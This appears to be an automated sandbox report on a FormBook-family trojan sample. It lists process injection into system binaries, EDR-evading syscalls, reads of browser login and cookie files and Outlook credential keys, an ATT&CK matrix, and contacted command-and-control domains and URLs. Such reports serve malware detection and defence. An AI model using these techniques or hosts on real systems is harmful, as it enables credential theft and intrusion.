            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtClose: Direct from: 0x77377B2E
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\RpcPing.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\RpcPing.exeThread register set: target process: 6244Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\RpcPing.exeThread APC queued: target process: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 315D008Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007A8C93 LogonUserW,0_2_007A8C93
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00753B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00753B4C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00754A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00754A35
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007B4EF5 mouse_event,0_2_007B4EF5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe"Jump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007A81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_007A81F7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007B4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_007B4C03
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: DUipWAeQLm.exe, 00000008.00000002.3339017603.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000000.2590373211.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339488424.0000000001431000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, DUipWAeQLm.exe, 00000008.00000002.3339017603.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000000.2590373211.0000000000D31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: DUipWAeQLm.exe, 00000008.00000002.3339017603.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000000.2590373211.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339488424.0000000001431000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: DUipWAeQLm.exe, 00000008.00000002.3339017603.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000000.2590373211.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339488424.0000000001431000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0077886B cpuid 0_2_0077886B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007850D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_007850D7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00792230 GetUserNameW,0_2_00792230
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0078418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0078418A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_00754AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00754AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\RpcPing.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeBinary or memory string: WIN_81
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeBinary or memory string: WIN_XP
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeBinary or memory string: WIN_XPe
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeBinary or memory string: WIN_VISTA
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeBinary or memory string: WIN_7
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeBinary or memory string: WIN_8
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007C6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_007C6596
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007C6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_007C6A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466067 Sample: SecuriteInfo.com.Trojan.Aut... Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 28 www.motorsportgives.com 2->28 30 www.costmoon.com 2->30 32 www.6171nvuhb.rent 2->32 42 Snort IDS alert for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 4 other signatures 2->48 10 SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe 4 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 DUipWAeQLm.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 RpcPing.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 DUipWAeQLm.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.6171nvuhb.rent 142.202.6.230, 49730, 49731, 49732 REPRISE-HOSTINGUS Reserved 22->34 36 www.motorsportgives.com 74.208.236.230, 49735, 49736, 49737 ONEANDONE-ASBrauerstrasse48DE United States 22->36 38 www.costmoon.com 74.208.236.38, 49727, 80 ONEANDONE-ASBrauerstrasse48DE United States 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe47%ReversingLabsWin32.Trojan.Autoit
            SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7c0%Avira URL Cloudsafe
            http://www.motorsportgives.com/9qp3/0%Avira URL Cloudsafe
            http://www.6171nvuhb.rent/hqcp/0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?7758179a36947d1ed305205311f9e27d0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.motorsportgives.com0%Avira URL Cloudsafe
            http://www.costmoon.com/9m56/?Stux7=wSNNrhltoDErcnEw+GwIxBUk+E+vX1/TDY+0HSDY/xjQqFM+lgiwoO4LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPNkNvcw4gdSknrLieRXJ4XwgsEWF+LJyDECQspbYqq9pNrRLiTEI=&YF9Df=_VBD7fO8YfupmT0%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?be472e8744edb3816324a1183cdffac60%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://aaa.za1.bztqk.cn/123.html0%Avira URL Cloudsafe
            http://www.6171nvuhb.rent/hqcp/?Stux7=a7ZQHf8WLvhHVBver5nOwZih6r/S4XIGgVvybuFCKLHzqS2zk6yuhV2s1hLkbw5zmPfcdtbcw9raqNmLcm/5Ggyq9qBeDFk3p2MLA1pm9c8F5HyDpkyVADePZbSIOvXG2KyhUgY=&YF9Df=_VBD7fO8YfupmT0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.costmoon.com
            		74.208.236.38
            		truetrue
              		unknown
              www.motorsportgives.com
              		74.208.236.230
              		truetrue
                		unknown
                www.6171nvuhb.rent
                		142.202.6.230
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.6171nvuhb.rent/hqcp/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.motorsportgives.com/9qp3/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.costmoon.com/9m56/?Stux7=wSNNrhltoDErcnEw+GwIxBUk+E+vX1/TDY+0HSDY/xjQqFM+lgiwoO4LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPNkNvcw4gdSknrLieRXJ4XwgsEWF+LJyDECQspbYqq9pNrRLiTEI=&YF9Df=_VBD7fO8YfupmTtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.6171nvuhb.rent/hqcp/?Stux7=a7ZQHf8WLvhHVBver5nOwZih6r/S4XIGgVvybuFCKLHzqS2zk6yuhV2s1hLkbw5zmPfcdtbcw9raqNmLcm/5Ggyq9qBeDFk3p2MLA1pm9c8F5HyDpkyVADePZbSIOvXG2KyhUgY=&YF9Df=_VBD7fO8YfupmTtrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ac.ecosia.org/autocomplete?q=RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://duckduckgo.com/chrome_newtabRpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://hm.baidu.com/hm.js?7758179a36947d1ed305205311f9e27dRpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://hm.baidu.com/hm.js?be472e8744edb3816324a1183cdffac6RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.motorsportgives.comDUipWAeQLm.exe, 0000000A.00000002.3339015758.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/ac/?q=RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoRpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7cRpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://aaa.za1.bztqk.cn/123.htmlRpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.ecosia.org/newtab/RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  74.208.236.38
                  		www.costmoon.comUnited States
                  		8560ONEANDONE-ASBrauerstrasse48DEtrue
                  74.208.236.230
                  		www.motorsportgives.comUnited States
                  		8560ONEANDONE-ASBrauerstrasse48DEtrue
                  142.202.6.230
                  		www.6171nvuhb.rentReserved
                  		62838REPRISE-HOSTINGUStrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1466067
                  Start date and time:2024-07-02 13:51:10 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 47s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:10
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:2
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@7/5@3/3
                  EGA Information:
                  • Successful, ratio: 75%
                  HCA Information:
                  • Successful, ratio: 91%
                  • Number of executed functions: 56
                  • Number of non-executed functions: 270
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
